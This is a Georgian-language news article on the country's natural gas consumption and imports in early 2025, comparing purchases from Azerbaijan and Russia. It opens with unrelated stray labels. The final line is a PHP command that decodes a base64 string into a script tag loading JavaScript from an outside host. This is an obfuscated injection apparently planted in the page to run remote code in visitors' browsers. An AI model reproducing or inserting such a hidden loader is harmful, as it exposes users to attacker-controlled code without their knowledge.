global distribution
გარე ავეჯი

 საქსტატის ინფორმაციით, 2025 წლის 5 თვეში (იანვარ-მაისი) საქართველომ დაახლოებით 1.5 მლრდ მ³ გაზი მოიხმარა, წლიურ ჭრილში გაზის მოხმარება მცირედით არის გაზრდილი.

აქედან 201 მლნ მ³ ელექტროენერგიის გამომუშავებაზე დაიხარჯა, გასულ წელთან შედარებით თბოსადგურების მოხმარება (დაახლოებით 64 მლნ მ³) არის შემცირებული. ტრადიციულად საქართველო თითქმის სრულად იმპორტირებულ გაზს მოიხმარს, რადგან შიდა წარმოება უმნიშვნელო 4.5 მლნ მ³ იყო.

რაც შეეხება ბუნებრივი აირის იმპორტს, 2025 წლის იანვარ-ივნისში საქართველომ 226 მლნ დოლარზე მეტი ღირებულების გაზი იყიდა, 2024 წელთან შედარებით 6%-ით მეტი .

სტატისტიკა აჩვენებს, რომ აზერბაიჯანიდან გაზის იმპორტი წელსაც შემცირდა, რუსეთიდან - გაიზარდა. 2025 წლის იანვარ-ივნისში საქართველოში აზერბაიჯანიდან იმპორტირებულია თითქმის 116 მლნ დოლარის ღირებულების გაზი, რაც 2024 წლის შესაბამის მაჩვენებელზე 8%-იანი კლებაა. აზერბაიჯანიდან შემცირებული იმპორტის ფონზე, რუსეთიდან გაზის შესყიდვები კვლავ იზრდება. 2025 წლის 6 თვეში საქართველომ 110.5 მლნ დოლარამდე რუსეთიდან ბუნებრივი აირის შესყიდვები გაზარდა, რაც წლიურად 26%-იანი ზრდაა.

სემეკის ანგარიშის მიხედვით, 2024 წელს აზერბაიჯანიდან გაზის იმპორტი (ოფციური და დამატებითი გაზის გარეშე) 775 მლნ მ³-მდე შემცირდა. ბოლო წლების ტენდენცია შარშანაც გაგრძელდა, საქართველომ რუსეთიდან გაზის იმპორტი 788 მლნ მ³-მდე გაზარდა, 2023 წელთან შედარებით რუსული გაზის იმპორტი 32%-ით არის გაზრდილი.

86
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");